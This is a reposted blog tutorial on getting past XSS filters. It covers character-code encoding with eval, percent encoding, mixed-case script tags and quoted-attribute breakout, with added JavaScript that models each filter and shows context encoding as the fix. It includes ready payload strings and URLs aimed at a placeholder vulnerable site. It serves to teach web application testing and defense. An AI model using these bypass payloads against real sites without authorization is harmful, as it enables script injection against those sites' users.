Original http://alihassanpenetrationtester.blogspot.com/2013/01/bypassing-xss-filters-advanced-xss.html
Hi friends, last time I explained what XSS is and how an attacker can inject a malicious script into your site. As promised, this is the advanced XSS tutorial (more articles will follow).
Sometimes a website owner puts an XSS filter (often a WAF) in front of the application to block XSS payloads.
For eg: if you submit <script>alert("Hi")</script>, the filter escapes (or replaces) the " (double quote) character, so what reaches the page is something like
<script>alert(\"Hi\")</script>
That is no longer a valid JavaScript string literal, so the script won't run. Filters use different methods of this kind, and for each there are tricks to get around them. Here I am going to cover four.
1. Bypassing magic_quotes_gpc
magic_quotes_gpc=On is a PHP setting (configured in php.ini) that automatically prefixes every ' (single quote), " (double quote) and \ (backslash) in GET, POST and cookie data with a backslash.
For eg:
<script>alert("HI");</script> is filtered to <script>alert(\"HI\");</script>, which is a JavaScript syntax error, so the script won't run.
This is a well-known filtering method (magic_quotes_gpc was deprecated in PHP 5.3 and removed in 5.4, but addslashes() and hand-written filters still escape quotes the same way), and it is easy to bypass: instead of writing the string as a quoted literal, build it from character codes with String.fromCharCode().
For eg: alert("hi") can be written as
String.fromCharCode(97,108,101,114,116,40,34,104,105,34,41)
String.fromCharCode() only builds the string, so to execute it the call is passed to eval(). The injected script becomes <script>eval(String.fromCharCode(97,108,101,114,116,40,34,104,105,34,41))</script>. There is no " (double quote), ' (single quote) or \ anywhere in it, so the filter has nothing to escape and the script runs.
String.fromCharCode() is a JavaScript function that converts a list of character codes (the ASCII values, for these characters) into a string.
How to convert to character codes?
There are online sites that do the conversion, but I suggest the Hackbar add-on for Mozilla Firefox.
After installing Hackbar, press F9. It opens a small bar above the URL bar. Click XSS -> String.fromCharCode().
A small window pops up. Enter the code, for instance alert("Hi"), and click OK. Now we have the output.
Wrap the output in eval() inside <script></script> and insert it into the vulnerable site.
For eg:
hxxp://vulnerable-site/search?q=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,104,105,34,41))</script>
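To see the whole of section 1 working end to end, here is an added example (my own code, not from the original post or from Hackbar): a model of the magic_quotes_gpc-style filter, the String.fromCharCode() encoder that Hackbar automates, and a check that the encoded payload passes through the filter untouched and decodes back to the same source. The function names are mine and the payload is the one from the post.

```javascript
// Added example, not code from the original post: a model of the
// magic_quotes_gpc-style filter from section 1 and the String.fromCharCode()
// encoding that gets a payload past it. All function names here are mine.

// What magic_quotes_gpc (and PHP's addslashes()) does to request input:
// prefix every single quote, double quote, backslash and NUL byte with "\".
function magicQuotes(input) {
  return input.replace(/([\\'"\0])/g, '\\$1');
}

// Rewrite any JavaScript source as a String.fromCharCode(...) call. The
// result contains only letters, digits, commas, a dot and parentheses, so a
// quote-escaping filter has nothing to touch. charCodeAt() walks UTF-16
// code units, which is exactly what String.fromCharCode() consumes.
function toFromCharCode(js) {
  const codes = [];
  for (let i = 0; i < js.length; i++) codes.push(js.charCodeAt(i));
  return 'String.fromCharCode(' + codes.join(',') + ')';
}

// String.fromCharCode() only builds the string; to execute it as code the
// call has to be fed to eval(). This is the form that goes inside <script>.
function toEvalPayload(js) {
  return 'eval(' + toFromCharCode(js) + ')';
}

// Decode a String.fromCharCode(...) call back to source, i.e. compute what
// the browser's JS engine would, to prove the round trip is lossless.
function fromCharCodeCall(encoded) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(encoded);
  if (!m) throw new Error('not a String.fromCharCode(...) call');
  return String.fromCharCode(...m[1].split(',').filter(Boolean).map(Number));
}

// True when the filter leaves the payload byte-for-byte intact.
function survivesMagicQuotes(payload) {
  return magicQuotes(payload) === payload;
}

// Constructed sample: the payload from the post.
const original = 'alert("hi")';
// magicQuotes(original)                        -> alert(\"hi\")  (JavaScript syntax error)
// toFromCharCode(original)                     -> String.fromCharCode(97,108,101,114,116,40,34,104,105,34,41)
// survivesMagicQuotes(original)                -> false
// survivesMagicQuotes(toEvalPayload(original)) -> true
```

The encoder works for any source, not just alert(): anything that must contain a quote, a backslash or a NUL can be expressed this way. The bypass only buys you a string literal, though; if the filter also strips <script> or blocks eval, this trick alone does nothing.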
2. Hex encoding
We can percent-encode the whole script (each byte written as %XX, its value in hex) so that a filter looking for the literal characters doesn't see them.
For example: <script>alert("Hi");</script> converts to hex as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the request to the vulnerable site.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
One caveat: the web server or PHP percent-decodes the query string before the application reads $_GET, so this only gets past a filter that inspects the raw, undecoded request; a filter that runs after decoding sees the plain <script> again.
Converting to hex:
This site converts text to hex code: http://centricle.com/tools/ascii-hex/
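As an added example (my own code, not from the original post or the centricle tool), here is the percent encoder for section 2 together with a toy filter placed on each side of URL decoding, so you can see exactly when the encoding helps. The function names and the toy filter are mine; the payload is the one from the post.

```javascript
// Added example, not code from the original post: the percent ("hex")
// encoding from section 2, and a check of which side of URL decoding a
// filter has to sit on for the encoding to get past it. Function names and
// the toy filter are mine.

// Encode every byte of the UTF-8 form as %xx, including the unreserved
// characters that encodeURIComponent() would leave readable.
function percentEncodeAll(s) {
  return Array.from(new TextEncoder().encode(s),
    b => '%' + b.toString(16).padStart(2, '0')).join('');
}

// A toy blocklist of the kind the post describes. Returns true if the
// input is allowed through.
function toyFilter(s) {
  return !/<script/i.test(s);
}

// Filter placed in front of URL decoding (a WAF rule matching the raw
// request line, for example). It sees only %3c%73... and lets it through.
function filterRawQuery(rawQuery) {
  return toyFilter(rawQuery);
}

// Filter placed where the application actually sees the value: PHP's $_GET
// (and every mainstream framework) has already percent-decoded it.
function filterDecodedParam(rawQuery) {
  return toyFilter(decodeURIComponent(rawQuery));
}

// Constructed sample: the payload from the post.
const payload = '<script>alert("Hi");</script>';
const encoded = percentEncodeAll(payload);
// encoded                     -> %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
// filterRawQuery(encoded)     -> true   (bypassed)
// filterDecodedParam(encoded) -> false  (caught)
```

The same reasoning extends to double encoding, which the post does not cover: percentEncodeAll(encoded) passes filterDecodedParam because one decode only yields %3c%73..., and it becomes a live <script> tag only if something downstream decodes it a second time. When testing a filter, find out how many times the stack decodes before and after it.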
3. Bypassing using obfuscation
Some website admins put script and alert on a restricted word list. Whenever your input contains one of these keywords, the filter removes it or rejects the request with an error message like "You are not allowed to search this". A filter that matches the keywords exactly can be bypassed by changing the case of the keyword (a simple form of obfuscation), because HTML tag names are case-insensitive:
<ScRiPt>alert("Hi");</ScRiPt>
This only works for the tag name, not for the JavaScript inside it: identifiers are case-sensitive, so AlErT is not alert and won't run. The technique rarely works, but it is worth a try.
4. Closing tag
When the input is reflected inside an HTML attribute value, putting "> at the beginning of the code often works:
"><script>alert("Hi");</script>
The " closes the attribute value and the > closes the tag that was opened before our input, so the <script> tag that follows is parsed as a new tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>
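Here is one added example (my own code, not from the original post) that covers sections 3 and 4 together: a case-sensitive keyword blocklist beside its case-insensitive version, a search box that reflects the query inside a quoted attribute, and the attribute encoding that closes both holes without a blocklist at all. The function names and the <input> template are mine; the payloads are the ones from the post.

```javascript
// Added example, not code from the original post: the two filter weaknesses
// from sections 3 and 4 side by side (a case-sensitive keyword blocklist,
// and a quoted attribute that "> breaks out of), with the attribute
// encoding that actually closes both. Function names and the <input>
// template are mine.

// Section 3. A blocklist that compares bytes exactly. The HTML tokenizer
// matches tag names case-insensitively, so <ScRiPt> is a script tag to the
// browser but not to this filter. Returns true when input is allowed.
function blocklistCaseSensitive(input) {
  return !['<script', '</script'].some(word => input.includes(word));
}

// The same blocklist done case-insensitively, which defeats the mixed-case
// trick. Note the trick never helped with the JavaScript part anyway:
// identifiers are case-sensitive, so AlErT("Hi") is a ReferenceError.
function blocklistCaseInsensitive(input) {
  return !/<\/?script/i.test(input);
}

// Section 4. The search term is reflected inside a quoted attribute value.
// A payload starting with "> closes the value and the <input> tag, and the
// rest of the input is parsed as new markup.
function renderSearchBox(q) {
  return '<input type="text" name="q" value="' + q + '">';
}

// The fix is not a better blocklist but encoding for the context the value
// lands in: inside a double-quoted attribute, & " ' < > become entities.
// & goes first so the entities themselves are not re-encoded.
function attrEncode(s) {
  return s.replace(/&/g, '&amp;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#39;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;');
}
function renderSearchBoxSafe(q) {
  return '<input type="text" name="q" value="' + attrEncode(q) + '">';
}

// Count the <script start tags a browser would see in a fragment, using the
// tokenizer's case-insensitive rule.
function scriptTagsIn(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed samples: the payloads from the post.
const mixedCase = '<ScRiPt>alert("Hi");</ScRiPt>';
const breakout  = '"><script>alert("Hi");</script>';
// blocklistCaseSensitive(mixedCase)           -> true  (bypassed)
// blocklistCaseInsensitive(mixedCase)         -> false (caught)
// scriptTagsIn(renderSearchBox(breakout))     -> 1     (attribute broken out of)
// scriptTagsIn(renderSearchBoxSafe(breakout)) -> 0
```

renderSearchBoxSafe shows why the conclusion below holds: with the value encoded for the attribute context, the "> payload is just text in the box, whatever case or keywords it uses, and no blocklist is needed. A blocklist is only ever as good as the next trick it has not heard of.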
Conclusion:
From the above it is clear that XSS filters alone are not going to protect a site from XSS attacks; what does protect it is encoding every reflected value for the context it lands in. If you really want to make your site more secure, ask pentesters to test your application, or test it yourself.
There are a lot of other filter bypass techniques; I have only covered some useful ones here.
Disclaimer:
This article is intended for educational purposes only.
Advanced XSS Tutorials for Web Application Pen Testing